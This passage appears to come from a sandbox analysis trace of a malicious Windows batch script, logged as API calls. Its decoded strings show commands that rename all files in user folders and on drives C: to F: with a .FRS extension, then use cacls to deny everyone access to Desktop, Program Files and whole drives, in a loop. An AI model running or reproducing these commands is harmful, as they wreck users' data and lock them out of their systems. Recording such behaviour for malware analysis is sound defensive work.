\"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0128.062] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.062] GetFileType (hFile=0x2e8) returned 0x1 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0128.062] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0128.062] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0128.062] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.062] GetFileType (hFile=0x2e8) returned 0x1 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0128.062] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0128.062] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0128.062] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.062] GetFileType (hFile=0x2e8) returned 0x1 [0128.062] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0128.062] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0128.063] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0128.063] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.063] GetFileType (hFile=0x2e8) returned 0x1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0128.063] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0128.063] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0128.063] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.063] GetFileType (hFile=0x2e8) returned 0x1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0128.063] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0128.063] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0128.063] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.063] GetFileType (hFile=0x2e8) returned 0x1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0128.063] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0128.063] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0128.063] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.063] GetFileType (hFile=0x2e8) returned 0x1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0128.063] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0128.063] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0128.063] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0128.064] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.064] GetFileType (hFile=0x2e8) returned 0x1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0128.064] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0128.064] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0128.064] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.064] GetFileType (hFile=0x2e8) returned 0x1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0128.064] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0128.064] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0128.064] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.064] GetFileType (hFile=0x2e8) returned 0x1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0128.064] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0128.064] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0128.064] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.064] GetFileType (hFile=0x2e8) returned 0x1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0128.064] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0128.064] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0128.064] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.064] GetFileType (hFile=0x2e8) returned 0x1 [0128.064] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0128.065] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0128.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0128.065] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.065] GetFileType (hFile=0x2e8) returned 0x1 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0128.065] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0128.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0128.065] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.065] GetFileType (hFile=0x2e8) returned 0x1 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0128.065] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0128.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0128.065] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.065] GetFileType (hFile=0x2e8) returned 0x1 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0128.065] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0128.065] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0128.065] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.065] GetFileType (hFile=0x2e8) returned 0x1 [0128.065] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0128.065] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0128.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0128.066] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.066] GetFileType (hFile=0x2e8) returned 0x1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0128.066] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0128.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0128.066] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.066] GetFileType (hFile=0x2e8) returned 0x1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0128.066] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0128.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0128.066] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.066] GetFileType (hFile=0x2e8) returned 0x1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0128.066] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0128.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0128.066] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.066] GetFileType (hFile=0x2e8) returned 0x1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0128.066] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0128.066] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0128.066] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0128.067] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.067] GetFileType (hFile=0x2e8) returned 0x1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0128.067] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0128.067] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0128.067] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.067] GetFileType (hFile=0x2e8) returned 0x1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0128.067] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0128.067] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0128.067] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0128.067] GetFileType (hFile=0x2e8) returned 0x1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0128.067] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0128.067] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0128.067] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0128.067] SetFilePointer (in: 